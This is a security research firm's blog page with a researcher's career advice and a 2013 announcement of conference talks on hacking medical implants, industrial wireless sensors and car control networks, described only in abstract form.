I like to research everything that could be used to play a better offense in real-world scenarios. Learning about technologies and discovering how to break them is something I do for a living. Defensive security has become stronger in some areas and requires more sophisticated techniques to reliably and precisely defeat. Today, hacking skills in general are more difficult to master because of the vast amount of information that is available out there. Great research demands a conceptual vision and being reckless when facing past experiences that show that something is not achievable. My technical interests involve discovering vulnerabilities, writing exploits, and playing offensive in CTF’s; something close to being inside the quicksand but behind defensive lines. This is one of my favourite feelings, and why I choose to work on security everyday.

My first advice to someone who would like to become a pen tester or researcher is to always maintain patience, dedication, and effort. This is a very satisfying career, but requires a deep and constant learning phase. Having a degree in Computer Science/Engineering will help you get a general overview of how the technology world works, but much of the knowledge and abilities can only be learned and mastered with personal intensive training. Technology changes every year, and future systems could be much different than today’s. The key is to not focus too much on one thing without tasting other fields inside the security world. Fortunately, they can be combined since in this career all the subjects have the same goal. Learn to appreciate other investigative works, blog posts, and publications; every detail is sometimes a result of months or weeks worth of work. Information is relatively available to everyone, you just need to dive in and start your journey with the topics you like most.

INSIGHTS | July 25, 2013

Las Vegas 2013

Again, that time of the year is approaching; thousands of people from the security community are preparing to head to Las Vegas for the most important hacking events: Black Hat USA and DefCon. IOActive will (as we do every year) have an important presence at these conferences.

We have some great researchers from our team presenting at Black Hat USA and DefCon. At Black Hat USA, Barnaby Jack will be presenting “Implantable medical devices: hacking humans”, and Lucas Apa and Carlos Mario Panagos will be presenting “Compromising industrial facilities from 40 miles away”. At DefCon, Chris Valasek will be presenting “Adventures in automotive networks and control units”.
These will be probably the most commented on talks, so don’t miss them!
During Black Hat USA, IOActive will also be hosting IOAsis. This event gives you an opportunity to meet our researchers, listen to some interesting presentations, participate in a hacking hardware workshop, and more—all while enjoying great drinks, food, and a massage.

 

Also back by popular demand and for the third time in a row, IOActive will be sponsoring and hosting Barcon. This is an invitation-only event where our top, l33t, sexy (maybe not ) researchers meet to drink and talk.

 

Lastly (but not least important), we are once again hosting “Freakshow”, our popular and greatest DefCon party, on Saturday, August 3rd at 9am at The Rio pools.

 

For your convenience, here are the details on our talks at Black Hat USA and DefCon:

 

IMPLANTABLE MEDICAL DEVICES: HACKING HUMANS
Who: Barnaby Jack
Where & When: Black Hat USA, August 1st, 2:15pm

 

In 2006, approximately 350,000 pacemakers and 173,000 ICD’s (Implantable Cardioverter Defibrillators) were implanted in the US alone. 2006 was an important year; this is when the FDA began approving fully wireless-based devices. Today there are well over 3 million pacemakers and over 1.7 million ICDs in use.
In this talk, I will focus on the security of wireless implantable medical devices and discuss how these devices operate and communicate and the security shortcomings of the current protocols. I will reveal IOActive’s internal research software that uses a common bedside transmitter to scan for and interrogate individual medical implants. Finally, I will discuss techniques that manufacturers can implement to improve the security of these devices.

 

COMPROMISING INDUSTRIAL FACILITIES FROM 40 MILES AWAY
Who: Lucas Apa and Carlos Mario Panagos
Where & When: Black Hat USA, August 1st, 3:30pm

 

The evolution of wireless technologies has allowed industrial automation and control systems (IACS) to become strategic assets for companies that rely on processing plants and facilities in industries such as energy production, oil, gas, water, utilities, refining, and petrochemical distribution and processing. Effective wireless sensor networks have enabled these companies to reduce implementation, maintenance, and equipment costs and enhance personal safety by enabling new topologies for remote monitoring and administration in hazardous locations.
However, the manner in which sensor networks handle and control cryptographic keys is very different from the way in which they are handled in traditional business networks. Sensor networks involve large numbers of sensor nodes with limited hardware capabilities, so the distribution and revocation of keys is not a trivial task.
In this presentation, we will review the most commonly implemented key distribution schemes, their weaknesses, and how vendors can more effectively align their designs with key distribution solutions. We will also demonstrate some attacks that exploit key distribution vulnerabilities, which we recently discovered in every wireless device developed over the past few years by three leading industrial wireless automation solution providers. These devices are widely used by many energy, oil, water, nuclear, natural gas, and refined petroleum companies.
An untrusted user or group within a 40-mile range could read from and inject data into these devices using radio frequency (RF) transceivers. A remotely and wirelessly exploitable memory corruption bug could disable all the sensor nodes and forever shut down an entire facility. When sensors and transmitters are attacked, remote sensor measurements on which critical decisions are made can be modified. This can lead to unexpected, harmful, and dangerous consequences.

 

Adventures in Automotive Networks and Control Units
Who: Chris Valasek
Where & When: DefCon, August 2nd, 10:00am
Automotive computers, or Electronic Control Units (ECU), were originally introduced to help with fuel efficiency and emissions problems of the 1970s but evolved into integral parts of in-car entertainment, safety controls, and enhanced automotive functionality.
In this presentation, I will examine some controls in two modern automobiles from a security researcher’s point of view. I will first cover the requisite tools and software needed to analyze a Controller Area Network (CAN) bus. I will also demo software to show how data can be read and written to the CAN bus. Then I will show how certain proprietary messages can be replayed by a device hooked up to an ODB-II connection to perform critical car functionality, such as braking and steering. Finally, I will discuss aspects of reading and modifying the firmware of ECUs installed in today’s modern automobile.